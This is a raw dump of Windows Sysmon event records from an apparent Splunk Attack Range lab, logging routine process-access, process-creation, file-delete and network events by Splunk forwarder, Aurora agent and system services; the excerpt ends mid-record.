12:25:29.146{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017412Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.146{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017411Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.146{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017410Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.146{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017409Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.146{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017408Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.146{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E539-63C7-1802-00000000B002}972C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017407Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.146{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E539-63C7-1802-00000000B002}972C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017406Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.147{E5A8D418-E539-63C7-1802-00000000B002}972C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000044905Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:29.083{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E538-63C7-6306-00000000AF02}4796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000044904Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:29.083{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E538-63C7-6306-00000000AF02}4796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000044903Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:29.083{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E538-63C7-6306-00000000AF02}4796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000017449Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:30.823{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F9F8C224776B06756232811FD2A92F2,SHA256=1D2757AFF959A5D2E201C956339581DE8C840F56A65DFB297DC04DFFE3E89376,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044928Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:30.573{FE4C2B44-E53A-63C7-6506-00000000AF02}27644440C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000044927Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:28.558{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56407-false10.0.1.12-8000- 23542300x800000000000000044926Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:30.495{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2BD86F94279567C5E6F6768EDB445D8,SHA256=B005D6CA83D8CA3F918CBADCFCA7A7958BF290298A59E11A510069D1BE6DAC07,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017448Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:30.217{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E53A-63C7-1A02-00000000B002}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017447Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:30.217{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017446Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:30.217{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017445Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:30.217{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017444Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:30.217{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017443Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:30.217{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017442Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:30.217{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017441Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:30.217{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017440Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:30.217{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017439Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:30.217{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017438Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:30.217{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E53A-63C7-1A02-00000000B002}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017437Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:30.217{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E53A-63C7-1A02-00000000B002}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017436Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:30.218{E5A8D418-E53A-63C7-1A02-00000000B002}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000017435Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:30.186{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 